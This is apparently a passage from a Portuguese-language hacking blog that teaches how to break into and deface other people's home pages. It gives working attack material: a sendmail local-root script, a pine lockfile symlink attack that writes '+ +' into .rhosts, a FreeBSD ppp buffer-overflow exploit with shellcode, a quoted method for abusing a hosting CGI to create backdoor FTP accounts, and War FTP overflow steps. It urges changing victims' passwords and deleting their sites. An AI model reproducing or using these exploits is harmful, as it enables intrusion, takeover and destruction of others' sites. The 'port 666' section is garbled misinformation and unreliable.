voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto! Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo. 10-TENET E EXPLOITS : Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin.... Vou listar alguns exploits abaixo : Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root. ----------------------------------------------------------------------------------------------------------------------------- cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi ---------------------------------------------------------------------------------------------------------- Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox. Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile. -------------------------------------------------------------------------------------------------------- hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. Funciona em "FreeBSD". #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Agora voce tem o root. Faça o que você quiser! Mas eu trocaria logo a senha da HP antes de mexer em qualquer coisa ou deletar. Pra trocar a senha da HP voce tem que é entrar via telnet E entrar com sua nova conta Ae voce digita "passwd :". Vai pedir a senha antiga e depois a senha que você quer colocar. Agora você só voce tem a senha e então é só fazer o que você quiser como deletar tudo e fazer o Upload das suas paginas. 11-HACKEANDO UMA HP QUE VOCÊ TENHA CADASTRO NO MESMO SERVIDOR.(2) Eu li esse texto e achei bem interessante falar sobre ele. Eu nao vou escrever esse metodo por mim porque prefiro deixar ele intacto, pois por descuido eu poderia corromper alguma informação. Infelizmente o texto é em ingles! Desculpe se você nao fala... Exploiting Net Adminstration CGI (taken from a text by Lord Somer) Well since nethosting.com either shutdown or whatever I figured what the hell before I forget how I did the more recent hacks etc... I'd tell you how so maybe you'll find the same sys elsewhere or be able to use it for ideas. Basically Nethosting.com did all it's administration via cgi's at net-admin.nethosting.com, well you need an account, card it if necessary, log in to net-administration, you'll see crap like ftp administration, email, etc... who really cares about e-mail so we'll go to ftp. Click on ftp administration. Lets say you were logged in as 7thsphere.com your url would be something like: http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl Just change the 7thsphere.com to any domain on the sys or if in the chmod cgi just del that part but keep the + sign and you edit the /usr/home dir. In the ftp administration make a backdoor account to that domain by creating an ftp who's dir is / since multiple /// still means /. Once you have your backdoor have fun. Oh yeah and in the email you can add aliases like I did to rhad's e-mail account at 7thsphere, why the hell is he on that winsock2.2 mailing list? Well the basic theory of this type of exploitation is that: the cgi is passed a paramater which we change to something else to edit it's info since it uses the stuff after the + to check that it's a valid logged in account(like hotmail does), it dosen't check the password again. multiple ///'s in unix just mean a /, thus we can get access to people's dir or the entire /usr/home dir Eu queria avisar aqui que todos os items relacionados aqui realmente funcionam! Se você nao conseguir, foi porque cometeu algum erro, ou fez "mal feito". Muita gente tem reclamado que não funciona... Se você entendeu tudo perfeitamente você pode hackear quase qualquer home page.
Invadindo Pela Porta 666
Invasão pela port 666 Esta primeira maneira é feita através da port 666 q é de uso xclusico do governo Americano. Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a port 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa. texto feito por «2001¤ØBP ëh» (fonte: primeira edição da D.O.N.)
FTP Bug's
FTPsBUGS "O texto orginal foi pego na Internet, a versão em Inglês, cujo o autor é desconhecido. Esta é uma versão em protuguês traduzida por.............. CRYPT O Buffer overflow do progama War FTP Daemon 1.65 para Windows 95/NT O popular progama WAR FTP Daemon para Windows 95 e NT contém um péssimo Buffer Overflow que permite que usuários mal intencionados executem códigos no seu HD ou simplesmente foder com o servidor de FTP O overflow existe em vários lugares incluindo o login de USER e PASS. Para vc "exploitar" vc precisa conectar em um servidor de WAR FTPD (porta 21 né o mané) e utilizar o seguinte comando: USER xxxxxxxxxxxxxxxxxxxxxxxxxxxxx (sentença bem longa) ou PASS xxxxxxxxxxxxxxxxxxxxxxxxxxxxx (sentença bem longa) A este ponto o WAR FTPD deverá quebrar. Agora nós estamos como Super-Usuários (o bom e velho root) e não mais como usuários de FTP comun e nos não precisamos de muitos recursos ou tempo para escrever o comando atual, de qualquer modo isto é possível!!! Durante os testes de bugs do WAR FTP, eu vi coisas interessantes sobre Overflows no MT 3.51/4.0, e no clinte de FTP do Win 95 Estes são os 3 ultimos problemas de Overflow no cliente de FTP 1º- O 1º problema é no campo do username. Faça um username maior que 285 caracteres, e o ftp.exe vai causar um problema de acesso. isto afeta somente Win NT 3.51/4.0.....principalmente no Windows 95 onde 154 caracteres já bastão 2º- O 2º problema esta no campo do password. Não tenho certeza de quantos caracteres são para isto acontecer, mas se vc segurar alguma tecla por alguns minutos e depois volte a pressiona-la denovo, vc vai causar uma bomba para FTP. Este só funciona em Win 95 3º-O 3º é com o comando de fpt. Digite em qualquer comando negado mais que 207 caracteres. O ftp.exe irá causar um procedimento de problema de acesso denovo. Isso afeta Win NT e Win 95 com clientes FTP
Assinar:
Postagens (Atom)